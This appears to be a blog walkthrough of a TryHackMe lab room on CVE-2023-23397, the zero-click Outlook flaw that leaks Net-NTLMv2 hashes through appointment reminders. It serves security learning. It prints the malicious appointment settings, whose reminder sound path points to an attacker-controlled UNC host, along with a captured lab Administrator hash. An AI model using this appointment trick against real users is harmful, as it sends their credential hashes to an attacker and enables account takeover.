In this walk through, we will be going through the Outlook NTLM Leak room from Tryhackme. This room covers the exploitation of CVE-2023-23397 which leak password hashes from a user by sending them an email. So, let’s get started without any delay.
Table of Contents
Task 1 – Introduction
Question 1 – Start the VM and continue learning!
Done
On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.
Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.
Task 2 – Abusing Appointment Alerts
Question 1 – Click and continue learning!
Done
Task 3 – Crafting a Malicious Appointment
Question 1 – Click and continue learning!
Done
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = “\10.10.183.48\nonexistent\sound.wav”
Administrator::THM-LAB:ceea8682077d7ab1:42A4F7AD8064006EFC44ADB8794FA5A7:0101000000000000009C3A687269D90106CC8D11F293FFBF0000000002000800560054003200470001001E00570049004E002D0054004E0035005600410057003800450041003000580004003400570049004E002D0054004E003500560041005700380045004100300058002E0056005400320047002E004C004F00430041004C000300140056005400320047002E004C004F00430041004C000500140056005400320047002E004C004F00430041004C0007000800009C3A687269D901060004000200000008003000300000000000000000000000003000009C63A468135C41065CCDB62C9B75754A0B92AD8B8ED1AE763C7EDEB4D8D5657C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E003100380033002E00340038000000000000000000
Task 4 – Weaponizing the Vulnerability
Question 1 – Click and continue learning!
Done
Task 5 – Detection/Mitigation
Question 1 – Click and continue learning!
Done
Task 6 – Conclusions
Also Read: Tryhackme – OhSINT
So that was “Outlook NTLM Leak” for you. In this room, we have covered the CVE-2023-23397 which is a critical zero click vulnerability that impacts all versions of the Outlook desktop app on any Windows system. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges and much more. On that note, i will take your leave and will meet you in next one. Till then, “Keep Hacking”.